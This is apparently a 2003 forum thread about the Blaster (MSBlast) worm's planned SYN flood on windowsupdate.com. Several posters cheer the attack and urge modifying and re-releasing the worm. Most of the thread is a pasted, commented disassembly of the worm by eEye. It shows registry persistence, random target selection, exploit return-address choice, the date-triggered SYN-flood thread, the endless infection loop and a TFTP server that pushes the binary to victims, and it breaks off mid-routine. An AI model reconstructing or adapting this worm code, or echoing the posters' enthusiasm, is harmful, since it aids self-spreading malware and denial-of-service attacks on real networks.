Today i check bitdefender website and find two article about Win32.Msblast.C and Win32.Msblast.B with this link

http://www.bitdefender.com/bd/site/virusin...u_id=1&v_id=150
http://www.bitdefender.com/bd/site/virusin...u_id=1&v_id=149

now tonight is a important night for blaster life ! all infected Machines start thE DDOS attack to windowsupdate.com website and Microsoft can protect this attack for long time ?! Today Microsoft Security department say we are ready for this attack

We should wait !

Black_Hat

Kewlness, cant wait for tonight, haha, it'll be funny to see M$ down for once and for all, but that is not what should've been the target, THE RIAA and MPAA should've been the targets, their today's public enemy #1.


Someone should modify the worm code and re-release it.

cool itll b fun to see the outcome of this attack i dont know y but i whoever it is thats doing this theres something inside me that wants them to succeed.

Hehe
Microsoft.com and windowsupdate.com down for 2 hours but it's not DDOS ATTACK . It's just security solution for change windowsupdate.com DNS server for protect this attack . Fore more infromation visit :
http://www.informationweek.com/story/showA...icleID=13100395
http://www.iht.com/articles/106638.html
http://cbs.marketwatch.com/news/story.asp?...gle&dist=google

Not to mention MSBLAST.D aka Welchia.Worm which removes MSBLAST and patches the system

http://securityresponse.symantec.com/avcen...lchia.worm.html

I wish i found that welchia worm sooner.. before i patched my other computer. My ISP is completed dead due to the network traffic created by the blaster worm. I would have liked to infect myself with welchia and go and clean up the network my self

did i hear someone say wish they had the msblaster code to modify it?

lol

.text:00401000 ;
.text:00401000 ; +-------------------------------------------------------------------------+
.text:00401000 ; | This file is generated by The Interactive Disassembler (IDA) |
.text:00401000 ; | Copyright © 2003 by DataRescue sa/nv, <ida@datarescue.com> |
.text:00401000 ; +-------------------------------------------------------------------------+
.text:00401000 ;
.text:00401000 ; MSBlaster worm disassembly by eEye Digital Security, Inc., August 12, 2003.
.text:00401000 ;
.text:00401000 ; Riley Hassell / Barnaby Jack / Ryan Permeh / Derek Soeder / Yuji Ukai
.text:00401000 ;
.text:00401000 ; Go to function WinMain() at 00401250 for the beginning of the worm code
.text:00401000 ; itself. Code before 00401250 and after 00402157 is standard CRT stuff and
.text:00401000 ; is therefore not commented.
.text:00401000 ;
.text:00401000 ; ---------------------------------------------------------------------------
.text:00401000 ; File Name : msblast.exe.unpacked
.text:00401000 ; Format : Portable executable for IBM PC (PE)
.text:00401000 ; Section 1. (virtual address 00001000)
.text:00401000 ; Virtual size : 00001458 ( 5208.)
.text:00401000 ; Section size in file : 00001458 ( 5208.)
.text:00401000 ; Offset to raw data for section: 00000400
.text:00401000 ; Flags 60000020: Text Executable Readable
.text:00401000 ; Alignment : 16 bytes ?
.text:00401000
.text:00401000
.text:00401000 unicode macro page,string,zero
.text:00401000 irpc c,<string>
.text:00401000 db '&c', page
.text:00401000 endm
.text:00401000 ifnb <zero>
.text:00401000 dw zero
.text:00401000 endif
.text:00401000 endm
.text:00401000
.text:00401000 model flat
.text:00401000
.text:00401000 ; ---------------------------------------------------------------------------
.text:00401000
.text:00401000 ; Segment type: Pure code
.text:00401000 ; Segment permissions: Read/Execute
.text:00401000 _text segment para public 'CODE' use32
.text:00401000 assume cs:_text
.text:00401000 ;org 401000h
.text:00401000 assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
.text:00401000
.text:00401000 loc_401000: ; DATA XREF: sub_401020+Avo
.text:00401000 xor eax, eax
.text:00401002 inc eax
.text:00401003 mov ecx, [esp+4]
.text:00401007 test dword ptr [ecx+4], 6
.text:0040100E jz short locret_40101F
.text:00401010 mov eax, [esp+8]
.text:00401014 mov edx, [esp+10h]
.text:00401018 mov [edx], eax
.text:0040101A mov eax, 3
.text:0040101F
.text:0040101F locret_40101F: ; CODE XREF: .text:0040100E^j
.text:0040101F retn
.text:00401020
.text:00401020 ; =============== S U B R O U T I N E =======================================
.text:00401020
.text:00401020
.text:00401020 sub_401020 proc near ; CODE XREF: .text:0040110Dvp
.text:00401020 ; .text:00401138vp
.text:00401020
.text:00401020 var_8 = dword ptr -8
.text:00401020 arg_0 = dword ptr 10h
.text:00401020 arg_4 = dword ptr 14h
.text:00401020
.text:00401020 push ebx
.text:00401021 push esi
.text:00401022 push edi
.text:00401023 mov eax, [esp+arg_0]
.text:00401027 push eax
.text:00401028 push 0FFFFFFFEh
.text:0040102A push offset loc_401000
.text:0040102F push large dword ptr fs:0
.text:00401036 mov large fs:0, esp
.text:0040103D
.text:0040103D loc_40103D: ; CODE XREF: sub_401020+44vj
.text:0040103D ; sub_401020+4Avj
.text:0040103D mov eax, [esp+10h+arg_0]
.text:00401041 mov ebx, [eax+8]
.text:00401044 mov esi, [eax+0Ch]
.text:00401047 cmp esi, 0FFFFFFFFh
.text:0040104A jz short loc_40106C
.text:0040104C cmp esi, [esp+10h+arg_4]
.text:00401050 jz short loc_40106C
.text:00401052 lea esi, [esi+esi*2]
.text:00401055 mov ecx, [ebx+esi*4]
.text:00401058 mov ecx, [esp+10h+var_8]
.text:0040105C mov ecx, [eax+0Ch]
.text:0040105F cmp dword ptr [ebx+esi*4+4], 0
.text:00401064 jnz short loc_40103D
.text:00401066 call dword ptr [ebx+esi*4+8]
.text:0040106A jmp short loc_40103D
.text:0040106C ; ---------------------------------------------------------------------------
.text:0040106C
.text:0040106C loc_40106C: ; CODE XREF: sub_401020+2A^j
.text:0040106C ; sub_401020+30^j
.text:0040106C pop large dword ptr fs:0
.text:00401073 add esp, 0Ch
.text:00401076 pop edi
.text:00401077 pop esi
.text:00401078 pop ebx
.text:00401079 retn
.text:00401079 sub_401020 endp
.text:00401079
.text:0040107A
.text:0040107A ; =============== S U B R O U T I N E =======================================
.text:0040107A
.text:0040107A ; Attributes: bp-based frame
.text:0040107A
.text:0040107A sub_40107A proc near ; CODE XREF: .text:00401100vp
.text:0040107A
.text:0040107A arg_0 = dword ptr 8
.text:0040107A
.text:0040107A push ebp
.text:0040107B mov ebp, esp
.text:0040107D push ebx
.text:0040107E push esi
.text:0040107F push edi
.text:00401080 push ebp
.text:00401081 push 0
.text:00401083 push 0
.text:00401085 push offset loc_401092
.text:0040108A push [ebp+arg_0]
.text:0040108D call RtlUnwind
.text:00401092
.text:00401092 loc_401092: ; DATA XREF: sub_40107A+B^o
.text:00401092 pop ebp
.text:00401093 pop edi
.text:00401094 pop esi
.text:00401095 pop ebx
.text:00401096 mov esp, ebp
.text:00401098 pop ebp
.text:00401099 retn
.text:00401099 sub_40107A endp
.text:00401099
.text:0040109A ; ---------------------------------------------------------------------------
.text:0040109A
.text:0040109A loc_40109A: ; DATA XREF: start+10vo
.text:0040109A cld
.text:0040109B push ebp
.text:0040109C mov ebp, esp
.text:0040109E sub esp, 8
.text:004010A1 push ebx
.text:004010A2 push esi
.text:004010A3 push edi
.text:004010A4 push ebp
.text:004010A5 mov ebx, [ebp+0Ch]
.text:004010A8 mov eax, [ebp+8]
.text:004010AB mov dword_404030, eax
.text:004010B0 mov dword_404034, ebx
.text:004010B6 test dword ptr [eax+4], 6
.text:004010BD jnz short loc_401131
.text:004010BF mov [ebp-8], eax
.text:004010C2 mov eax, [ebp+10h]
.text:004010C5 mov [ebp-4], eax
.text:004010C8 mov dword_404034, eax
.text:004010CD lea eax, [ebp-8]
.text:004010D0 mov [ebx-4], eax
.text:004010D3 mov esi, [ebx+0Ch]
.text:004010D6 mov edi, [ebx+8]
.text:004010D9
.text:004010D9 loc_4010D9: ; CODE XREF: .text:0040112Bvj
.text:004010D9 cmp esi, 0FFFFFFFFh
.text:004010DC jz short loc_401140
.text:004010DE lea ecx, [esi+esi*2]
.text:004010E1 cmp dword ptr [edi+ecx*4+4], 0
.text:004010E6 jz short loc_401122
.text:004010E8 push esi
.text:004010E9 push ebp
.text:004010EA lea ebp, [ebx+10h]
.text:004010ED call dword ptr [edi+ecx*4+4]
.text:004010F1 pop ebp
.text:004010F2 pop esi
.text:004010F3 mov ebx, [ebp+0Ch]
.text:004010F6 or eax, eax
.text:004010F8 jz short loc_401122
.text:004010FA js short loc_40112D
.text:004010FC mov edi, [ebx+8]
.text:004010FF push ebx
.text:00401100 call sub_40107A
.text:00401105 add esp, 4
.text:00401108 lea ebp, [ebx+10h]
.text:0040110B push esi
.text:0040110C push ebx
.text:0040110D call sub_401020
.text:00401112 add esp, 8
.text:00401115 lea ecx, [esi+esi*2]
.text:00401118 mov eax, [edi+ecx*4]
.text:0040111B mov eax, [ebx+0Ch]
.text:0040111E call dword ptr [edi+ecx*4+8]
.text:00401122
.text:00401122 loc_401122: ; CODE XREF: .text:004010E6^j
.text:00401122 ; .text:004010F8^j
.text:00401122 mov edi, [ebx+8]
.text:00401125 lea ecx, [esi+esi*2]
.text:00401128 mov esi, [edi+ecx*4]
.text:0040112B jmp short loc_4010D9
.text:0040112D ; ---------------------------------------------------------------------------
.text:0040112D
.text:0040112D loc_40112D: ; CODE XREF: .text:004010FA^j
.text:0040112D xor eax, eax
.text:0040112F jmp short loc_4011A2
.text:00401131 ; ---------------------------------------------------------------------------
.text:00401131
.text:00401131 loc_401131: ; CODE XREF: .text:004010BD^j
.text:00401131 push ebp
.text:00401132 lea ebp, [ebx+10h]
.text:00401135 push 0FFFFFFFFh
.text:00401137 push ebx
.text:00401138 call sub_401020
.text:0040113D add esp, 0Ch
.text:00401140
.text:00401140 loc_401140: ; CODE XREF: .text:004010DC^j
.text:00401140 push 0
.text:00401142 mov dword_404010, 0Bh
.text:0040114C push 0Bh
.text:0040114E call signal
.text:00401153 add esp, 8
.text:00401156 or eax, eax
.text:00401158 jnz short loc_40117B
.text:0040115A push 0
.text:0040115C mov dword_404010, 8
.text:00401166 push 8
.text:00401168 call signal
.text:0040116D add esp, 8
.text:00401170 or eax, eax
.text:00401172 jnz short loc_40117B
.text:00401174 mov eax, 1
.text:00401179 jmp short loc_4011A2
.text:0040117B ; ---------------------------------------------------------------------------
.text:0040117B
.text:0040117B loc_40117B: ; CODE XREF: .text:00401158^j
.text:0040117B ; .text:00401172^j
.text:0040117B cmp eax, 0FFFFFFFFh
.text:0040117E jz short loc_4011AA
.text:00401180 push eax
.text:00401181 push dword_404010
.text:00401187 call signal
.text:0040118C add esp, 8
.text:0040118F push dword_404010
.text:00401195 call raise
.text:0040119A add esp, 4
.text:0040119D mov eax, 1
.text:004011A2
.text:004011A2 loc_4011A2: ; CODE XREF: .text:0040112F^j
.text:004011A2 ; .text:00401179^j ...
.text:004011A2 pop ebp
.text:004011A3 pop edi
.text:004011A4 pop esi
.text:004011A5 pop ebx
.text:004011A6 mov esp, ebp
.text:004011A8 pop ebp
.text:004011A9 retn
.text:004011AA ; ---------------------------------------------------------------------------
.text:004011AA
.text:004011AA loc_4011AA: ; CODE XREF: .text:0040117E^j
.text:004011AA cmp dword_40402C, 0
.text:004011B1 jnz short loc_4011BA
.text:004011B3 mov eax, 1
.text:004011B8 jmp short loc_4011A2
.text:004011BA ; ---------------------------------------------------------------------------
.text:004011BA
.text:004011BA loc_4011BA: ; CODE XREF: .text:004011B1^j
.text:004011BA mov eax, dword_40402C
.text:004011BF push 0Bh
.text:004011C1 jmp eax
.text:004011C3 ; ---------------------------------------------------------------------------
.text:004011C3 pop eax
.text:004011C4 mov eax, 1
.text:004011C9 jmp short loc_4011A2
.text:004011CB
.text:004011CB ; =============== S U B R O U T I N E =======================================
.text:004011CB
.text:004011CB ; Attributes: bp-based frame
.text:004011CB
.text:004011CB public start
.text:004011CB start proc near
.text:004011CB
.text:004011CB var_30 = word ptr -30h
.text:004011CB var_18 = dword ptr -18h
.text:004011CB var_4 = dword ptr -4
.text:004011CB
.text:004011CB mov eax, large fs:0
.text:004011D1 push ebp
.text:004011D2 mov ebp, esp
.text:004011D4 push 0FFFFFFFFh
.text:004011D6 push offset unk_40401C
.text:004011DB push offset loc_40109A
.text:004011E0 push eax
.text:004011E1 mov large fs:0, esp
.text:004011E8 sub esp, 10h
.text:004011EB push ebx
.text:004011EC push esi
.text:004011ED push edi
.text:004011EE mov [ebp+var_18], esp
.text:004011F1 push eax
.text:004011F2 fnstcw [esp+30h+var_30]
.text:004011F5 or word ptr [esp], 300h
.text:004011FB fldcw [esp+30h+var_30]
.text:004011FE add esp, 4
.text:00401201 push 0
.text:00401203 push 0
.text:00401205 push offset dword_404028
.text:0040120A push offset dword_404024
.text:0040120F push offset dword_404020
.text:00401214 call __GetMainArgs
.text:00401219 push dword_404028
.text:0040121F push dword_404024
.text:00401225 push dword_404020
.text:0040122B mov dword_404014, esp
.text:00401231 call sub_402254
.text:00401236 add esp, 18h
.text:00401239 xor ecx, ecx
.text:0040123B mov [ebp+var_4], ecx
.text:0040123E push eax
.text:0040123F call exit
.text:00401244 leave
.text:00401245 retn
.text:00401245 start endp
.text:00401245
.text:00401245 ; ---------------------------------------------------------------------------
.text:00401246 align 4
.text:00401248 mov large fs:0, eax
.text:0040124E retn
.text:0040124E ; ---------------------------------------------------------------------------
.text:0040124F align 4
.text:00401250
.text:00401250 ; =============== S U B R O U T I N E =======================================
.text:00401250
.text:00401250 ; Attributes: bp-based frame
.text:00401250
.text:00401250 WinMain proc near ; CODE XREF: sub_402254+5Cvp
.text:00401250
.text:00401250 in = in_addr ptr -3ACh
.text:00401250 var_3A8 = dword ptr -3A8h
.text:00401250 var_3A4 = dword ptr -3A4h
.text:00401250 name = byte ptr -3A0h
.text:00401250 WSAData = WSAData ptr -1A0h
.text:00401250 szMonth = byte ptr -10h
.text:00401250 szDay = byte ptr -0Ch
.text:00401250 hKey = dword ptr -8
.text:00401250 ThreadId = dword ptr -4
.text:00401250
.text:00401250 push ebp
.text:00401251 mov ebp, esp
.text:00401253 sub esp, 3ACh
.text:00401259 push esi
.text:0040125A push edi
.text:0040125B xor esi, esi
.text:0040125D
.text:0040125D Create/open HKLM\Software\Microsoft\Windows\CurrentVersion\Run
.text:0040125D
.text:0040125D push 0 ; lpdwDisposition
.text:0040125F lea eax, [ebp+hKey]
.text:00401262 push eax ; phkResult
.text:00401263 push 0 ; lpSecurityAttributes
.text:00401265 push 0F003Fh ; samDesired
.text:0040126A push 0 ; dwOptions
.text:0040126C push 0 ; lpClass
.text:0040126E push 0 ; Reserved
.text:00401270 push offset aSoftwareMicros ; lpSubKey
.text:00401275 push 80000002h ; hKey = HKEY_LOCAL_MACHINE
.text:0040127A call RegCreateKeyExA
.text:0040127F
.text:0040127F Create "windows auto update" string value = "msblast.exe"
.text:0040127F
.text:0040127F push 32h ; cbData (some extra here after null term)
.text:00401281 push offset aMsblast_exe ; lpData
.text:00401286 push 1 ; dwType = REG_SZ
.text:00401288 push 0 ; Reserved
.text:0040128A push offset aWindowsAutoUpd ; lpValueName
.text:0040128F push [ebp+hKey] ; hKey
.text:00401292 call RegSetValueExA
.text:00401297 push [ebp+hKey] ; hKey
.text:0040129A call RegCloseKey
.text:0040129F
.text:0040129F Create "BILLY" named mutex to prevent multiple infection
.text:0040129F
.text:0040129F push offset aBilly ; lpName
.text:004012A4 push 1 ; bInitialOwner
.text:004012A6 push 0 ; lpMutexAttributes
.text:004012A8 call CreateMutexA
.text:004012AD call GetLastError
.text:004012B2 cmp eax, 0B7h ; 183 (0xB7): mutex already exists
.text:004012B7 jnz short loc_4012C0 ; if BILLY mutex does not exist... continue here
.text:004012B9 push 0 ; uExitCode
.text:004012BB call ExitProcess
.text:004012C0
.text:004012C0 Initialize Winsock
.text:004012C0
.text:004012C0 loc_4012C0: ; CODE XREF: WinMain+67^j
.text:004012C0 lea eax, [ebp+WSAData] ; if BILLY mutex does not exist... continue here
.text:004012C6 push eax ; lpWSAData
.text:004012C7 push 202h ; wVersionRequested (2.2)
.text:004012CC call WSAStartup
.text:004012D1 or eax, eax
.text:004012D3 jz short loc_401304
.text:004012D5 lea eax, [ebp+WSAData]
.text:004012DB push eax ; lpWSAData
.text:004012DC push 101h ; wVersionRequested (1.1)
.text:004012E1 call WSAStartup
.text:004012E6 or eax, eax
.text:004012E8 jz short loc_401304
.text:004012EA lea eax, [ebp+WSAData]
.text:004012F0 push eax ; lpWSAData
.text:004012F1 push 1 ; wVersionRequested (1.0)
.text:004012F3 call WSAStartup
.text:004012F8 or eax, eax
.text:004012FA jz short loc_401304
.text:004012FC or eax, 0FFFFFFFFh
.text:004012FF jmp loc_401570 ; return
.text:00401304 ; ---------------------------------------------------------------------------
.text:00401304
.text:00401304 loc_401304: ; CODE XREF: WinMain+83^j
.text:00401304 ; WinMain+98^j ...
.text:00401304 push 104h ; nSize
.text:00401309 push offset Filename ; lpFilename
.text:0040130E push 0 ; hModule
.text:00401310 call GetModuleFileNameA ; get worm executable's file name (for fopen()'ing later)
.text:00401315
.text:00401315 Wait until host is connected to Internet
.text:00401315
.text:00401315 loc_401315: ; CODE XREF: WinMain+DEvj
.text:00401315 push 0 ; sleep 20 second intervals until connected to Internet
.text:00401317 lea eax, [ebp+ThreadId]
.text:0040131A push eax
.text:0040131B call InternetGetConnectedState
.text:00401320 or eax, eax
.text:00401322 jnz short loc_401330 ; start at beginning of subnet (x.x.x.0)
.text:00401324 push 4E20h ; dwMilliseconds = 20000 (20 seconds)
.text:00401329 call Sleep
.text:0040132E jmp short loc_401315 ; sleep 20 second intervals until connected to Internet
.text:00401330 ; ---------------------------------------------------------------------------
.text:00401330
.text:00401330 Get IP address and selectively apply randomization
.text:00401330
.text:00401330 loc_401330: ; CODE XREF: WinMain+D2^j
.text:00401330 and ds:octet4, 0 ; start at beginning of subnet (x.x.x.0)
.text:00401337 call GetTickCount
.text:0040133C push eax
.text:0040133D call srand ; seed random number generator with GetTickCount()
.text:00401342 pop ecx
.text:00401343 call rand
.text:00401348 mov ecx, 0FEh
.text:0040134D cdq
.text:0040134E idiv ecx
.text:00401350 mov edi, edx
.text:00401352 inc edi
.text:00401353 mov ds:synspoofoctet1, edi ; rand() % 254
.text:00401353 ; make first and second octets of spoofed SYN
.text:00401353 ; source address random at first -- if we can't
.text:00401353 ; get our local IP, then leave these random;
.text:00401353 ; otherwise, replace them with our local IP's
.text:00401353 ; first and second octets
.text:00401359 call rand
.text:0040135E mov ecx, 0FEh
.text:00401363 cdq
.text:00401364 idiv ecx
.text:00401366 mov ds:synspoofoctet2, edx ; rand() % 254
.text:0040136C push 200h ; namelen
.text:00401371 lea eax, [ebp+name]
.text:00401377 push eax ; name
.text:00401378 call gethostname ; get name of local machine for IP lookup
.text:0040137D cmp eax, 0FFFFFFFFh
.text:00401380 jz loc_401476 ; did gethostname() fail?
.text:00401386 lea eax, [ebp+name]
.text:0040138C push eax ; name
.text:0040138D call gethostbyname ; now that we have machine name, get local IP address
.text:00401392 mov [ebp+var_3A4], eax
.text:00401398 or eax, eax
.text:0040139A jz loc_401476 ; did gethostbyname() fail?
.text:004013A0 mov ecx, [eax+0Ch]
.text:004013A3 cmp dword ptr [ecx], 0
.text:004013A6 jz loc_401476 ; is *h_addr_list NULL? (couldn't get a local IP address)
.text:004013AC push 4 ; sizeof(struct in_addr) = 4
.text:004013AE mov eax, [eax+0Ch]
.text:004013B1 push dword ptr [eax] ; use ptr to first address in h_addr_list as source
.text:004013B3 lea eax, [ebp+in]
.text:004013B9 push eax ; dest is &[EBP+in], which is struct in_addr
.text:004013BA call memcpy
.text:004013BF push dword ptr [ebp+in.S_un] ; in
.text:004013C5 call inet_ntoa
.text:004013CA push eax
.text:004013CB push offset aS ; "%s"
.text:004013D0 lea edi, [ebp+name]
.text:004013D6 push edi
.text:004013D7 call sprintf
.text:004013DC push offset a_ ; "."
.text:004013E1 lea eax, [ebp+name]
.text:004013E7 push eax
.text:004013E8 call strtok ; get first octet from IP address string ("." is delimiter)
.text:004013ED mov [ebp+var_3A8], eax
.text:004013F3 push eax
.text:004013F4 call atoi
.text:004013F9 mov ds:octet1, eax
.text:004013FE push offset a_ ; "."
.text:00401403 push 0
.text:00401405 call strtok ; get second octet
.text:0040140A mov [ebp+var_3A8], eax
.text:00401410 push eax
.text:00401411 call atoi
.text:00401416 mov ds:octet2, eax
.text:0040141B push offset a_ ; "."
.text:00401420 push 0
.text:00401422 call strtok ; get third octet
.text:00401427 mov [ebp+var_3A8], eax
.text:0040142D push eax
.text:0040142E call atoi
.text:00401433 add esp, 3Ch
.text:00401436 mov ds:octet3, eax
.text:0040143B cmp eax, 14h
.text:0040143E jle short loc_40145F ; third octet <= 20?
.text:00401440 call GetTickCount
.text:00401445 push eax
.text:00401446 call srand
.text:0040144B pop ecx
.text:0040144C call rand
.text:00401451 mov ecx, 14h
.text:00401456 cdq
.text:00401457 idiv ecx
.text:00401459 sub ds:octet3, edx ; subtract (rand() % 20) from 3rd octet (if it's > 20)
.text:0040145F
.text:0040145F loc_40145F: ; CODE XREF: WinMain+1EE^j
.text:0040145F mov eax, ds:octet1 ; use first and second octets of local IP for
.text:0040145F ; spoofed source address of SYN packets
.text:0040145F ; (this code will only be reached if we were
.text:0040145F ; able to get the local machine's IP address)
.text:00401464 mov ds:synspoofoctet1, eax
.text:00401469 mov eax, ds:octet2
.text:0040146E mov ds:synspoofoctet2, eax
.text:00401473 xor esi, esi
.text:00401475 inc esi ; ESI = 1
.text:00401476
.text:00401476 loc_401476: ; CODE XREF: WinMain+130^j
.text:00401476 ; WinMain+14A^j ...
.text:00401476 call GetTickCount ; jump ahead to here if unable to get local IP
.text:00401476 ; (note that ESI=0 if we jumped here after failing
.text:00401476 ; to get our local IP, meaning that, in that case,
.text:00401476 ; we'll always randomize the initial target IP)
.text:0040147B push eax
.text:0040147C call srand
.text:00401481 pop ecx
.text:00401482 call rand
.text:00401487 mov ecx, 14h
.text:0040148C cdq
.text:0040148D idiv ecx
.text:0040148F cmp edx, 0Ch ; EDX = random number from 0..19
.text:00401492 jge short loc_401496 ; ESI=1: 8/20 (40%) chance
.text:00401494 xor esi, esi ; ESI=0: 12/20 (60%) chance
.text:00401496
.text:00401496 Randomly decide which return address to use in the exploit
.text:00401496 80%: dwWhichRetAddr = 1 -- Windows XP address (0100139Dh)
.text:00401496 20%: dwWhichRetAddr = 2 -- Windows 2000 address (0018759Fh)
.text:00401496
.text:00401496 loc_401496: ; CODE XREF: WinMain+242^j
.text:00401496 mov ds:dwWhichRetAddr, 1
.text:004014A0 call rand
.text:004014A5 mov ecx, 0Ah
.text:004014AA cdq
.text:004014AB idiv ecx
.text:004014AD cmp edx, 7 ; EDX = rand() % 10
.text:004014B0 jle short loc_4014BC ; 8/10 (80%) chance: leave dwWhichRetAddr = 1 (XP ret addr)
.text:004014B2 mov ds:dwWhichRetAddr, 2 ; 2/10 (20%) chance: set to 2 (Windows 2000 ret addr)
.text:004014BC
.text:004014BC 12/20 (60%) chance that the 1st, 2nd, and 3rd octets will be randomized:
.text:004014BC 1st: 1..254
.text:004014BC 2nd: 0..253
.text:004014BC 3rd: 0..253
.text:004014BC
.text:004014BC loc_4014BC: ; CODE XREF: WinMain+260^j
.text:004014BC or esi, esi
.text:004014BE jnz short loc_4014FC ; if ESI=1 (40% chance), DON'T randomize first 3 octets
.text:004014C0 call rand
.text:004014C5 mov ecx, 0FEh
.text:004014CA cdq
.text:004014CB idiv ecx
.text:004014CD mov edi, edx
.text:004014CF inc edi
.text:004014D0 mov ds:octet1, edi ; (rand() % 254) + 1
.text:004014D6 call rand
.text:004014DB mov ecx, 0FEh
.text:004014E0 cdq
.text:004014E1 idiv ecx
.text:004014E3 mov ds:octet2, edx ; rand() % 254
.text:004014E9 call rand
.text:004014EE mov ecx, 0FEh
.text:004014F3 cdq
.text:004014F4 idiv ecx
.text:004014F6 mov ds:octet3, edx ; rand() % 254
.text:004014FC
.text:004014FC Check date to decide whether or not to SYN flood windowsupdate.com
.text:004014FC
.text:004014FC loc_4014FC: ; CODE XREF: WinMain+26E^j
.text:004014FC push 3 ; cchDate
.text:004014FE lea eax, [ebp+szDay]
.text:00401501 push eax ; lpDateStr
.text:00401502 push offset aD ; lpFormat = "d"
.text:00401507 push 0 ; lpDate
.text:00401509 push 0 ; dwFlags
.text:0040150B push 409h ; Locale
.text:00401510 call GetDateFormatA
.text:00401515 push 3 ; cchDate
.text:00401517 lea eax, [ebp+szMonth]
.text:0040151A push eax ; lpDateStr
.text:0040151B push offset aM ; lpFormat = "M"
.text:00401520 push 0 ; lpDate
.text:00401522 push 0 ; dwFlags
.text:00401524 push 409h ; Locale
.text:00401529 call GetDateFormatA
.text:0040152E lea eax, [ebp+szDay]
.text:00401531 push eax
.text:00401532 call atoi
.text:00401537 pop ecx
.text:00401538 cmp eax, 0Fh ; if day is after 15th...
.text:0040153B jg short loc_40154C ; ...then SYN flood windowsupdate.com:80
.text:0040153D lea edi, [ebp+szMonth]
.text:00401540 push edi
.text:00401541 call atoi
.text:00401546 pop ecx
.text:00401547 cmp eax, 8 ; ...or month is after August (8)...
.text:0040154A jle short loc_401562 ; infinitely call infection loop function
.text:0040154C
.text:0040154C If day is > 15 or month > 8 (August), create SYN flood thread
.text:0040154C
.text:0040154C loc_40154C: ; CODE XREF: WinMain+2EB^j
.text:0040154C lea eax, [ebp+ThreadId] ; ...then SYN flood windowsupdate.com:80
.text:0040154F push eax ; lpThreadId
.text:00401550 push 0 ; dwCreationFlags
.text:00401552 push 0 ; lpParameter
.text:00401554 push offset WUSYNFloodThread ; lpStartAddress
.text:00401559 push 0 ; dwStackSize
.text:0040155B push 0 ; lpThreadAttributes
.text:0040155D call CreateThread
.text:00401562
.text:00401562 Infect sequential IP addresses endlessly, 20 hosts at a time
.text:00401562
.text:00401562 loc_401562: ; CODE XREF: WinMain+2FA^j
.text:00401562 ; WinMain+317vj
.text:00401562 call infect20Hosts ; infinitely call infection loop function
.text:00401567 jmp short loc_401562 ; infinitely call infection loop function
.text:00401569 ; ---------------------------------------------------------------------------
.text:00401569 call WSACleanup
.text:0040156E xor eax, eax
.text:00401570
.text:00401570 loc_401570: ; CODE XREF: WinMain+AF^j
.text:00401570 pop edi ; return
.text:00401571 pop esi
.text:00401572 leave
.text:00401573 retn 10h
.text:00401573 WinMain endp
.text:00401573
.text:00401576
.text:00401576 ; =============== S U B R O U T I N E =======================================
.text:00401576
.text:00401576 ; Attributes: bp-based frame
.text:00401576
.text:00401576 TFTPServerThread proc near ; DATA XREF: infectTarget+39Fvo
.text:00401576
.text:00401576 buf = byte ptr -42Ch
.text:00401576 name = sockaddr ptr -228h
.text:00401576 to = sockaddr ptr -218h
.text:00401576 tolen = dword ptr -208h
.text:00401576 var_204 = word ptr -204h
.text:00401576 var_202 = word ptr -202h
.text:00401576 var_200 = byte ptr -200h
.text:00401576
.text:00401576 push ebp
.text:00401577 mov ebp, esp
.text:00401579 sub esp, 42Ch
.text:0040157F push ebx
.text:00401580 push esi
.text:00401581 push edi
.text:00401582 mov dwTFTPInProgress, 1
.text:0040158C
.text:0040158C loc_40158C: ; CODE XREF: TFTPServerThread+16Fvj
.text:0040158C push 0 ; protocol = IPPROTO_IP
.text:0040158E push 2 ; type = SOCK_DGRAM
.text:00401590 push 2 ; af = AF_INET
.text:00401592 call socket
.text:00401597 mov ds:s, eax
.text:0040159C cmp eax, 0FFFFFFFFh
.text:0040159F jz loc_4016EA
.text:004015A5 push 10h
.text:004015A7 push 0
.text:004015A9 lea eax, [ebp+name]
.text:004015AF push eax
.text:004015B0 call memset
.text:004015B5 add esp, 0Ch
.text:004015B8 mov [ebp+name.sa_family], 2
.text:004015C1 push 45h ; hostshort = 69 (TFTP)
.text:004015C3 call htons
.text:004015C8 mov edx, eax
.text:004015CA mov word ptr [ebp+name.sa_data], dx
.text:004015D1 and dword ptr [ebp+name.sa_data+2], 0
.text:004015D8 push 10h ; namelen
.text:004015DA lea eax, [ebp+name]
.text:004015E0 push eax ; name
.text:004015E1 push ds:s ; s
.text:004015E7 call bind
.text:004015EC or eax, eax
.text:004015EE jnz loc_4016EA
.text:004015F4 mov [ebp+tolen], 10h
.text:004015FE lea eax, [ebp+tolen]
.text:00401604 push eax ; fromlen
.text:00401605 lea eax, [ebp+to]
.text:0040160B push eax ; from
.text:0040160C push 0 ; flags
.text:0040160E push 204h ; len
.text:00401613 lea eax, [ebp+buf]
.text:00401619 push eax ; buf
.text:0040161A push ds:s ; s
.text:00401620 call recvfrom
.text:00401625 cmp eax, 1
.text:00401628 jl loc_4016EA
.text:0040162E xor ebx, ebx
.text:00401630 push offset aRb ; "rb"
.text:00401635 push offset Filename ; 260 (104h) = MAX_PATH
.text:0040163A call fopen
.text:0040163F add esp, 8
.text:00401642 mov esi, eax
.text:00401644 or eax, eax
.text:00401646 jz loc_4016EA
.text:0040164C
.text:0040164C loc_40164C: ; CODE XREF: TFTPServerThread+15Dvj
.text:0040164C inc ebx
.text:0040164D push 3 ; hostshort
.text:0040164F call htons
.text:00401654 mov edx, eax
.text:00401656 mov [ebp+var_204], dx ; TFTP packet format: (all network order)
.text:00401656 ; 0000 WORD = 3?
.text:00401656 ; 0002 WORD chunk number (starts at 1)
.text:00401656 ; 0004 start of data
.text:0040165D mov eax, ebx
.text:0040165F and eax, 0FFFFh
.text:00401664 push eax ; hostshort
.text:00401665 call htons
.text:0040166A mov edx, eax
.text:0040166C mov [ebp+var_202], dx
.text:00401673 push esi
.text:00401674 push 200h
.text:00401679 push 1
.text:0040167B lea eax, [ebp+var_200]
.text:00401681 push eax
.text:00401682 call fread
.text:00401687 add esp, 10h
.text:0040168A mov edi, eax ; length actually read
.text:0040168C add edi, 4 ; + 4 (for TFTP header)
.text:0040168F push [ebp+tolen] ; tolen
.text:00401695 lea eax, [ebp+to]
.text:0040169B push eax ; to
.text:0040169C push 0 ; flags
.text:0040169E push edi ; len
.text:0040169F lea eax, [ebp+var_204]
.text:004016A5 push eax ; buf
.text:004016A6 push ds:s ; s
.text:004016AC call sendto
.text:004016B1 cmp eax, 1
.text:004016B4 jl short loc_4016D8
.text:004016B6 push 384h ; dwMilliseconds
.text:004016BB call Sleep ; sleep for 0.9 seconds
.text:004016C0 cmp edi, 204h
.text:004016C6 jnb short loc_4016D3
.text:004016C8 push esi
.text:004016C9 call fclose
